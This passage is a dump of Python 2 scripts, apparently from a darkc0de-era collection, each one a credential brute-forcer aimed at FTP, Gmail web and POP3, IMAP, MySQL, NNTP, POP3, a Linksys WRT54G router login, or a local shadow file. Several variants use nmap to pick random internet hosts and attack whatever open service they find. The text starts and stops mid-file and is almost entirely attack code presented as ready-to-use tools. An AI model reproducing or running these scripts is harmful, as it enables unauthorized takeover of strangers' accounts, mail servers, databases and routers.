print "\nExample: ./randftpbf.py 10000 users.txt words.txt -nmap -save hits.txt\n"
sys.exit(0)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
for arg in sys.argv[1:]:
if arg.lower() == "-nmap" or arg.lower() == "-n":
nmap = 1
if arg.lower() == "-save" or arg.lower() == "-s":
txt = sys.argv[int(sys.argv[1:].index(arg))+2]
print "\n\t d3hydr8[at]gmail[dot]com RandomftpBF v1.1"
print "\t-----------------------------------------------\n"
print "[+] Scanning:",sys.argv[1],"hosts"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
try:
if txt:
save_file = open(txt, "a")
print "[+] Save File:",txt
except(NameError):
txt = None
print "[-] Saving Mode Off"
print "[+] Scan Started:",timer()
try:
if nmap == 1:
print "[+] Socket Scan Mode\n"
for x in xrange(int(sys.argv[1])):
print "[-]",x+1,"of",sys.argv[1]
#Change this limit for faster results.
time.sleep(3)
ipaddr = servscan()
if ipaddr != None:
brute(ipaddr)
print "\n[+] Scan Complete:",timer()
else:
print "\n[-] Error: Check your options\n"
sys.exit(1)
except(NameError):
print "[+] Nmap Mode\n"
for x in xrange(int(sys.argv[1])):
print "[-]",x+1,"of",sys.argv[1]
#Change this limit for faster results.
time.sleep(3)
ipaddr = nmapscan()
if ipaddr != None:
brute(ipaddr[0])
print "\n[+] Scan Complete:",timer()
================================================
FILE: ftpbrute_random1.0.py
================================================
#!usr/bin/python
#Uses nmap to check if ftp port is open, brute forces if it is.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, ftplib, re
from ftplib import FTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./ftpbrute.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com ftpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1],"hosts"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def scan():
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -iR 1 -p 21 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
return ipaddr
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
ftp = FTP(ipaddr[0])
ftp.login(user[:-1], value)
ftp.retrlines('LIST')
print "\t\nLogin successful:",user, value
ftp.quit()
work.join()
sys.exit(2)
except (ftplib.all_errors), msg:
print "An error occurred:", msg
pass
for x in range(int(sys.argv[1])):
print "Scanning:",x,"of",sys.argv[1]
ipaddr = scan()
if ipaddr != None:
print "\n\tAttempting BruteForce:",ipaddr[0],"\n"
try:
f = FTP(ipaddr[0])
print "[+] Response:",f.getwelcome()
except (ftplib.all_errors):
pass
try:
print "\n[+] Checking for anonymous login:",ipaddr[0],"\n"
ftp = FTP(ipaddr[0])
ftp.login()
ftp.retrlines('LIST')
print "\t\nAnonymous login successful!!!\n"
ftp.quit()
except (ftplib.all_errors):
print "\tAnonymous login unsuccessful\n"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(2)
================================================
FILE: gmailbrute.py
================================================
#!usr/bin/python
#Gmail Brute Forcer
#To use this script you need ClientCookie and Client Form.
#http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
#http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
#To install the package, run the following command:
#python setup.py build
#then (with appropriate permissions)
#python setup.py install
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, socket, httplib, re
try:
sys.path.append('ClientCookie-1.0.3')
import ClientCookie
sys.path.append('ClientForm-0.1.17')
import ClientForm
except(ImportError):
print "\nTo use this script you need ClientCookie and Client Form."
print "Read the top intro for instructions.\n"
sys.exit(1)
from copy import copy
if len(sys.argv) !=3:
print "Usage: ./gmailbrute.py "
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com GmailBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server: https://www.gmail.com/"
print "[+] User:",sys.argv[1]
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0]
class Worker(threading.Thread):
def run(self):
global success
value = getword()
try:
print "-"*12
print "User:",sys.argv[1],"Password:",value
cookieJar = ClientCookie.CookieJar()
opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
opener.addheaders = [("User-agent","Mozilla/5.0 (compatible)")]
ClientCookie.install_opener(opener)
fp = ClientCookie.urlopen("https://www.gmail.com/")
forms = ClientForm.ParseResponse(fp)
form = forms[0]
form["Email"] = sys.argv[1]
form["Passwd"] = value
fp = ClientCookie.urlopen(form.click())
site = fp.readlines()
for line in site:
if re.search("Gmail - Inbox", line):
print "\tSuccessful Login:", value
success = value
sys.exit(1)
fp.close()
except(socket.gaierror), msg:
pass
for i in range(len(words)):
work = Worker()
work.start()
time.sleep(1)
time.sleep(3)
try:
if success:
print "\n\n[+] Successful Login: https://www.gmail.com/"
print "[+] User:",sys.argv[1]," Password:",success
except(NameError):
print "\n[+] Couldn't find correct password"
pass
print "\n[+] Done\n"
================================================
FILE: gmailpopbrute.py
================================================
#!usr/bin/python
#Gmail Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, poplib
from copy import copy
if len(sys.argv) !=3:
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "\t Usage: ./gmailpopbrute.py \n"
sys.exit(1)
server = "pop.gmail.com"
success = []
try:
users = open(sys.argv[1], "r").readlines()
except(IOError):
print "[-] Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "[-] Error: Check your wordlist path\n"
sys.exit(1)
try:
pop = poplib.POP3_SSL(server, 995)
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass
print "\n\t d3hydr8[at]gmail[dot]com GmailPopBruteForcer v1.0"
print "\t --------------------------------------------------\n"
print "[+] Server:",server
print "[+] Port: 995"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "[-] Reloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0], users[0]
else:
return value[0], users[0]
class Worker(threading.Thread):
def run(self):
value, user = getword()
user = user.replace("\n","")
value = value.replace("\n","")
try:
print "-"*12
print "[+] User:",user,"Password:",value
pop = poplib.POP3_SSL(server, 995)
pop.user(user)
pop.pass_(value)
print "\t\t\n\nLogin successful:",user, value
print "\t\tMail:",pop.stat()[0],"emails"
print "\t\tSize:",pop.stat()[1],"bytes\n\n"
success.append(user)
success.append(value)
success.append(pop.stat()[0])
success.append(pop.stat()[1])
pop.quit()
except (poplib.error_proto), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
if len(success) >=1:
print "\n\n[+] Login successful:",success[0], success[1]
print "\t[+] Mail:",success[2],"emails"
print "\t[+] Size:",success[3],"bytes\n"
print "\n[-] Done"
================================================
FILE: imapbrute.py
================================================
#!usr/bin/python
#IMAP Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, imaplib, socket
from imaplib import IMAP4
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./imapbrute.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com imapBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
M = imaplib.IMAP4(sys.argv[1])
M = login(user, value)
print "\t\nLogin successful:",user, value
M.close()
M.logout()
work.join()
sys.exit(2)
except(IMAP4.error, socket.gaierror, socket.error, socket.herror), msg:
print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
================================================
FILE: imapbrute_iprange.py
================================================
#!usr/bin/python
#IMAP Brute Forcer, searches ip_range for hosts using imap.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, imaplib, re, socket
from imaplib import IMAP4
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./imapbrute.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com imapBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
wordlist = copy(words)
def scan():
iprange = sys.argv[1]
ip_list = []
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 21 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
ip_list.append(ipaddr[0])
return ip_list
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
M = imaplib.IMAP4(ip)
M = login(user[:-1], value)
print "\t\nLogin successful:",user, value
M.close()
M.logout()
work.join()
sys.exit(2)
except(IMAP4.error, socket.gaierror, socket.error, socket.herror), msg:
print "An error occurred:", msg
pass
ip_list = scan()
print "[+] Hosts Loaded:",len(ip_list),"\n"
for ip in ip_list:
print "\n\tAttempting BruteForce:",ip,"\n"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(1)
================================================
FILE: imapbrute_random.py
================================================
#!usr/bin/python
#Uses nmap to check if imap port is open, brute forces if it is.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, imaplib, re, socket
from imaplib import IMAP4
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./imapbrute.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com imapBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1],"hosts"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def scan():
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -iR 1 -p 143 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
return ipaddr
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
M = imaplib.IMAP4(ipaddr[0])
M = login(user[:-1], value)
print "\t\nLogin successful:",user, value
M.close()
M.logout()
work.join()
sys.exit(2)
except(IMAP4.error, socket.gaierror, socket.error, socket.herror), msg:
print "An error occurred:", msg
pass
for x in range(int(sys.argv[1])):
print "Scanning:",x,"of",sys.argv[1]
ipaddr = scan()
if ipaddr != None:
print "\n\tAttempting BruteForce:",ipaddr[0],"\n"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(2)
================================================
FILE: linksysbrute.py
================================================
#!usr/bin/python
#Linksys WRT54G router brute force
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, urllib2, socket
if len(sys.argv) !=4:
print "Usage: ./linksysbrute.py "
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
username = sys.argv[2]
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
lock.release()
return value[0][:-1]
def getauth(url):
req = urllib2.Request(url)
try:
handle = urllib2.urlopen(req)
except IOError, e:
pass
authline = e.headers.get('www-authenticate', '')
server = e.headers.get('server', '')
return authline, server
class Worker(threading.Thread):
def run(self):
password = getword()
try:
print "-"*12
print "User:",username,"Password:",password
req = urllib2.Request(sys.argv[1])
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, sys.argv[1], username, password)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
fd = opener.open(req)
print "\t\n\n[+] Login successful: Username:",username,"Password:",password,"\n"
print "[+] Retrieved", fd.geturl()
info = fd.info()
for key, value in info.items():
print "%s = %s" % (key, value)
sys.exit(2)
except (urllib2.HTTPError,socket.error):
pass
print "\n\t d3hydr8[at]gmail[dot]com LinksysBrute v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] User:",username
print "[+] Words Loaded:",len(words)
try:
auth, server = getauth(sys.argv[1])
except(AttributeError):
print "\n[-] Connection Failure\n"
sys.exit(1)
if auth.find("WRT54G") == -1:
print "[-] WRT54G Router not found"
print "[+] Server:",server
print "[+]",auth,"\n"
for i in range(len(words)):
work = Worker()
work.setDaemon(1)
work.start()
time.sleep(1)
================================================
FILE: locbrute.py
================================================
#!/usr/bin/python
#Local account brute forcer.
#(You need to be able to read shadow file)
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import sys, crypt, spwd
if len(sys.argv) != 3:
print "\nUsage: ./locbrute.py "
print "Ex: ./locbrute.py root words.txt\n"
sys.exit(1)
print "\nAccounts with encrypted passwords:\n"
users = spwd.getspall()
for user in users:
if user[1] not in ["*","!"]:
print user[:2]
try:
words = open(sys.argv[2], "r").readlines()
except(IOError):
print "\n[-] Error: Couldn't open wordlist\n"
sys.exit(1)
print "\n[+] Words Loaded:",len(words)
try:
passwd = spwd.getspnam(sys.argv[1])[1]
except(KeyError):
print "\n[-] User not found. Check list above\n"
sys.exit(1)
print "[+] Cracking:",passwd
for word in words:
word = word.replace("\n","")
if crypt.crypt(word, passwd) == passwd:
print "\n[!] Cracked: [ ",word," ]\n"
sys.exit(1)
print "\n[-] Couldn't find match\n"
================================================
FILE: mysqlbrute.py
================================================
#!usr/bin/python
#MySQL Brute Forcer
#You need the MySQLdb package found here:
#http://sourceforge.net/projects/mysql-python
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys
from copy import copy
try:
import MySQLdb
except(ImportError):
print "\nYou need the MySQLdb package found here: http://sourceforge.net/projects/mysql-python\n"
sys.exit(1)
if len(sys.argv) !=6:
print "Usage: ./mysqlbrute.py "
sys.exit(1)
try:
users = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[5], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com MySQLBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Port:",sys.argv[2]
print "[+] Database:",sys.argv[3]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
db=MySQLdb.connect(host=sys.argv[1],user=user,passwd=value,db=sys.argv[3],port=int(sys.argv[2]))
print "\t\nLogin successful:",value, user
db.close()
work.join()
sys.exit(2)
except(MySQLdb.Error), msg:
#print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
================================================
FILE: mysqlbrute_iprange.py
================================================
#!usr/bin/python
#MySQL Brute Forcer, searches ip_range for hosts using MySQL.
#You need the MySQLdb package found here:
#http://sourceforge.net/projects/mysql-python
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, re
from copy import copy
try:
import MySQLdb
except(ImportError):
print "\nYou need the MySQLdb package found here: http://sourceforge.net/projects/mysql-python\n"
sys.exit(1)
if len(sys.argv) !=4:
print "Usage: ./mysqlbrute_iprange.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com MySQLBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
wordlist = copy(words)
def scan():
iprange = sys.argv[1]
ip_list = []
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 3306 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
ip_list.append(ipaddr[0])
return ip_list
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
db=MySQLdb.connect(host=ip,user=user,passwd=value)
print "\t\nLogin successful:",user, value
db.close()
work.join()
sys.exit(2)
except(MySQLdb.Error), msg:
#print "An error occurred:", msg
pass
ip_list = scan()
print "[+] Hosts Loaded:",len(ip_list),"\n"
for ip in ip_list:
print "\n\tAttempting BruteForce:",ip,"\n"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(1)
================================================
FILE: mysqlbrute_random.py
================================================
#!usr/bin/python
#Uses nmap to check if MySQL port is open, brute forces if it is.
#You need the MySQLdb package found here:
#http://sourceforge.net/projects/mysql-python
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, re
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./mysqlbrute_random.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com MySQLBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1],"hosts"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def scan():
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -iR 1 -p 3306 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
return ipaddr
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
db=MySQLdb.connect(host=ipaddr[0],user=user,passwd=value)
print "\t\nLogin successful:",user, value
db.close()
work.join()
sys.exit(2)
except(MySQLdb.Error), msg:
#print "An error occurred:", msg
pass
for x in range(int(sys.argv[1])):
print "Scanning:",x,"of",sys.argv[1]
ipaddr = scan()
if ipaddr != None:
print "\n\tAttempting BruteForce:",ipaddr[0],"\n"
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(2)
================================================
FILE: nntpbrute.py
================================================
#!usr/bin/python
#NNTP Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, nntplib, socket
from nntplib import NNTP
from copy import copy
if len(sys.argv) !=5:
print "Usage: ./nntpbrute.py "
sys.exit(1)
try:
users = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[4], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com nntpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
try:
n = nntplib.NNTP(sys.argv[1],int(sys.argv[2]))
print "[+] Response:",n.getwelcome(),"\n"
n.quit()
except(nntplib.NNTPError, socket.gaierror, socket.error, socket.herror):
pass
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "\nReloading Wordlist - Changing User\n"
reloader()
value = random.sample(words, 1)
users.remove(users[0])
lock.release()
if len(users) ==1:
return value[0][:-1], users[0]
else:
return value[0][:-1], users[0][:-1]
class Worker(threading.Thread):
def run(self):
value, user = getword()
try:
print "-"*12
print "User:",user,"Password:",value
n = nntplib.NNTP(sys.argv[1],int(sys.argv[2]),user,value)
print "\t\nLogin successful:",value, user
n.quit()
work.join()
sys.exit(2)
except(nntplib.NNTPError, socket.gaierror, socket.error, socket.herror), msg:
print "An error occurred:", msg
pass
for i in range(len(words)*len(users)):
work = Worker()
work.start()
time.sleep(1)
================================================
FILE: nntpbrute_iprange.py
================================================
#!usr/bin/python
#NNTP Brute Forcer, searches ip_range for hosts using nntp.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, nntplib, re, socket
from nntplib import NNTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./ftpbrute.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com nntpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
wordlist = copy(words)
def scan():
iprange = sys.argv[1]
ip_list = []
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 '+iprange+' -p 119 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
ip_list.append(ipaddr[0])
return ip_list
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
n = nntplib.NNTP(ip,119,user,value)
print "\t\nLogin successful:",user, value
n.quit()
work.join()
sys.exit(2)
except(nntplib.NNTPError, socket.gaierror, socket.error, socket.herror), msg:
print "An error occurred:", msg
pass
ip_list = scan()
print "[+] Hosts Loaded:",len(ip_list),"\n"
for ip in ip_list:
print "\n\tAttempting BruteForce:",ip,"\n"
try:
n = nntplib.NNTP(ip,119)
print "[+] Response:",n.getwelcome(),"\n"
n.quit()
except(nntplib.NNTPError, socket.gaierror, socket.error, socket.herror):
pass
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(1)
================================================
FILE: nntpbrute_random.py
================================================
#!usr/bin/python
#Uses nmap to check if NNTP port is open, brute forces if it is.
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, StringIO, commands, random, sys, nntplib, re, socket
from nntplib import NNTP
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./nntpbrute.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
print "\n\t d3hydr8[at]gmail[dot]com nntpBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Scanning:",sys.argv[1],"hosts"
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words),"\n"
wordlist = copy(words)
def scan():
nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -iR 1 -p 119 | grep open -B 3')[1]).readlines()
for tmp in nmap:
ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", tmp)
if ipaddr:
return ipaddr
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist\n"
reloader()
value = random.sample(words, 1)
lock.release()
return value[0][:-1]
class Workhorse(threading.Thread):
def run(self):
value = getword()
try:
print "-"*12
print "User:",user[:-1],"Password:",value
n = nntplib.NNTP(ipaddr[0],119,user,value)
print "\t\nLogin successful:",user, value
n.quit()
work.join()
sys.exit(2)
except (nntplib.NNTPError, socket.gaierror, socket.error, socket.herror), msg:
#print "An error occurred:", msg
pass
for x in range(int(sys.argv[1])):
print "Scanning:",x,"of",sys.argv[1]
ipaddr = scan()
if ipaddr != None:
print "\n\tAttempting BruteForce:",ipaddr[0],"\n"
try:
n = nntplib.NNTP(ipaddr[0],119)
print "[+] Response:",n.getwelcome(),"\n"
n.quit()
except(nntplib.NNTPError, socket.gaierror, socket.error, socket.herror):
pass
for user in users:
for i in range(len(words)):
if i == 0: reloader()
work = Workhorse()
work.start()
time.sleep(2)
================================================
FILE: popbrute.py
================================================
#!usr/bin/python
#Pop3 Brute Forcer
#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com
import threading, time, random, sys, poplib
from copy import copy
if len(sys.argv) !=4:
print "Usage: ./popbrute.py "
sys.exit(1)
try:
users = open(sys.argv[2], "r").readlines()
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
try:
words = open(sys.argv[3], "r").readlines()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
try:
pop = poplib.POP3(sys.argv[1])
welcome = pop.getwelcome()
pop.quit()
except (poplib.error_proto):
welcome = "No Response"
pass
print "\n\t d3hydr8[at]gmail[dot]com popBruteForcer v1.0"
print "\t--------------------------------------------------\n"
print "[+] Server:",sys.argv[1]
print "[+] Users Loaded:",len(users)
print "[+] Words Loaded:",len(words)
print "[+] Server response:",welcome,"\n"
wordlist = copy(words)
def reloader():
for word in wordlist:
words.append(word)
def getword():
lock = threading.Lock()
lock.acquire()
if len(words) != 0:
value = random.sample(words, 1)
words.remove(value[0])
else:
print "Reloading Wordlist - Changing User\n"
